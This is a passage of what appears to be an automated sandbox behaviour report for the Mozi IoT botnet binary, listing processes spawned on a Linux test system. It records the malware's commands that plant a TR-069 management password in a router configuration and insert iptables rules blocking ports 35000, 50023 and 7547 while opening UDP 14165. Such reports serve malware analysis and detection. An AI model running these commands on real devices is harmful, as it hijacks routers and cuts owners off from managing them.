                                                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:40
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/upstart
                                                                                                        Arguments:n/a
                                                                                                        File size:0 bytes
                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/date
                                                                                                        Arguments:date
                                                                                                        File size:68464 bytes
                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/share/apport/apport-checkreports
                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                        File size:1269 bytes
                                                                                                        MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/upstart
                                                                                                        Arguments:n/a
                                                                                                        File size:0 bytes
                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/date
                                                                                                        Arguments:date
                                                                                                        File size:68464 bytes
                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/share/apport/apport-gtk
                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                        File size:23806 bytes
                                                                                                        MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/upstart
                                                                                                        Arguments:n/a
                                                                                                        File size:0 bytes
                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/date
                                                                                                        Arguments:date
                                                                                                        File size:68464 bytes
                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/share/apport/apport-gtk
                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                        File size:23806 bytes
                                                                                                        MD5 hash:ec58a49a30ef6a29406a204f28cc7d87